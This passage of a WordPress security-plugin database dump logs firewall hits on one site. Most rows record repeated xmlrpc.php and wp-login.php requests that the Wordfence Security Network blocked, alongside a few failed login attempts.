x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11559,0.000000,1631006386.331810,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11560,0.000000,1631006398.301683,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11561,0.000000,1631007549.272350,'\0\0\0\0\0\0\0\0\0\0����)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11562,0.000000,1631007552.626196,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11563,0.000000,1631008925.644802,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11564,0.000000,1631008928.134533,'\0\0\0\0\0\0\0\0\0\0����\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11565,0.000000,1631010424.726884,'\0\0\0\0\0\0\0\0\0\0���#j�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11566,0.000000,1631010453.028707,'\0\0\0\0\0\0\0\0\0\0����L',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11567,0.000000,1631012281.695989,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11568,0.000000,1631012292.443885,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11569,0.000000,1631018768.326516,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11570,1631018769.744784,1631018769.627500,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11571,0.000000,1631019563.871321,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,200,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4','loginFailInvalidUsername',NULL,NULL),(11572,0.000000,1631021817.026661,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11573,0.000000,1631021829.886148,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11574,0.000000,1631022415.287127,'\0\0\0\0\0\0\0\0\0\0��/jv�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11575,0.000000,1631022433.572155,'\0\0\0\0\0\0\0\0\0\0��C�= ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11576,0.000000,1631023036.249995,'\0\0\0\0\0\0\0\0\0\0��Q\\ڝ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11577,0.000000,1631023041.420452,'\0\0\0\0\0\0\0\0\0\0��m��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11578,0.000000,1631023612.562572,'\0\0\0\0\0\0\0\0\0\0��\"{3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11579,0.000000,1631023628.599156,'\0\0\0\0\0\0\0\0\0\0���yQ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11580,0.000000,1631024195.201326,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11581,0.000000,1631024222.186430,'\0\0\0\0\0\0\0\0\0\0���C�u',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11582,0.000000,1631024800.730506,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11583,0.000000,1631024822.491940,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11584,0.000000,1631025370.693733,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11585,0.000000,1631025383.229978,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11586,0.000000,1631025915.054459,'\0\0\0\0\0\0\0\0\0\0�����f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11587,0.000000,1631025945.659863,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11588,0.000000,1631026456.299642,'\0\0\0\0\0\0\0\0\0\0���n�R',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11589,0.000000,1631026464.844970,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11590,0.000000,1631026989.386479,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11591,0.000000,1631026990.791884,'\0\0\0\0\0\0\0\0\0\0���[a�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11592,0.000000,1631027488.999734,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11593,0.000000,1631027490.975513,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11594,0.000000,1631027971.609851,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11595,0.000000,1631027983.845424,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11596,0.000000,1631028464.766743,'\0\0\0\0\0\0\0\0\0\0��g��E',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11597,0.000000,1631028487.327631,'\0\0\0\0\0\0\0\0\0\0��P��F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11598,0.000000,1631028987.372780,'\0\0\0\0\0\0\0\0\0\0��4�w%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11599,0.000000,1631028991.246381,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11600,0.000000,1631029475.252717,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11601,0.000000,1631029475.845977,'\0\0\0\0\0\0\0\0\0\0���A�O',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11602,0.000000,1631030004.066702,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11603,0.000000,1631030004.806143,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11604,0.000000,1631030512.590582,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11605,0.000000,1631030517.505203,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11606,0.000000,1631031020.625587,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11607,0.000000,1631031021.487843,'\0\0\0\0\0\0\0\0\0\0���D�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11608,0.000000,1631031533.884977,'\0\0\0\0\0\0\0\0\0\0����P�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11609,0.000000,1631031548.191512,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11610,0.000000,1631032064.292639,'\0\0\0\0\0\0\0\0\0\0��g��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11611,0.000000,1631032092.898339,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11612,0.000000,1631032606.183572,'\0\0\0\0\0\0\0\0\0\0��ν�V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11613,0.000000,1631032610.982521,'\0\0\0\0\0\0\0\0\0\0��˖0v',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11614,0.000000,1631033148.100036,'\0\0\0\0\0\0\0\0\0\0��£�5',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11615,0.000000,1631033163.889118,'\0\0\0\0\0\0\0\0\0\0��N�(�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11616,0.000000,1631033696.612436,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11617,1631033699.284925,1631033699.169800,'\0\0\0\0\0\0\0\0\0\0��£�5',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(11618,0.000000,1631034215.952985,'\0\0\0\0\0\0\0\0\0\0�����o',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11619,0.000000,1631034233.151994,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11620,0.000000,1631034756.089035,'\0\0\0\0\0\0\0\0\0\0���_�',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(11621,0.000000,1631034790.834767,'\0\0\0\0\0\0\0\0\0\0���W�\'',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11622,0.000000,1631034799.909106,'\0\0\0\0\0\0\0\0\0\0���~�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11623,0.000000,1631035334.905992,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11624,0.000000,1631035350.843418,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11625,0.000000,1631035930.563397,'\0\0\0\0\0\0\0\0\0\0��E��|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11626,0.000000,1631035932.601305,'\0\0\0\0\0\0\0\0\0\0��C�= ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11627,0.000000,1631036495.805805,'\0\0\0\0\0\0\0\0\0\0��l���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11628,0.000000,1631036500.432938,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11629,0.000000,1631037065.097800,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11630,0.000000,1631037071.337601,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11631,0.000000,1631037626.606066,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11632,0.000000,1631037651.350402,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11633,0.000000,1631038221.187523,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11634,0.000000,1631038813.301932,'\0\0\0\0\0\0\0\0\0\0��3O��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11635,0.000000,1631038826.935206,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11636,0.000000,1631039396.930365,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11637,0.000000,1631039404.881289,'\0\0\0\0\0\0\0\0\0\0���~�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11638,0.000000,1631039975.513607,'\0\0\0\0\0\0\0\0\0\0���Dm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11639,0.000000,1631039982.542665,'\0\0\0\0\0\0\0\0\0\0��ν�V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11640,0.000000,1631040565.025610,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11641,0.000000,1631040582.545102,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11642,0.000000,1631040677.316988,'\0\0\0\0\0\0\0\0\0\0��%�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11643,0.000000,1631041151.971774,'\0\0\0\0\0\0\0\0\0\0����>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11644,0.000000,1631041177.209467,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11645,0.000000,1631041769.249593,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11646,0.000000,1631041776.924286,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11647,0.000000,1631042371.258291,'\0\0\0\0\0\0\0\0\0\0��H�)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11648,0.000000,1631042375.306925,'\0\0\0\0\0\0\0\0\0\0��%�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11649,0.000000,1631042977.704808,'\0\0\0\0\0\0\0\0\0\0��g�6�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11650,0.000000,1631042988.545137,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11651,0.000000,1631043597.599751,'\0\0\0\0\0\0\0\0\0\0���8\Z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by 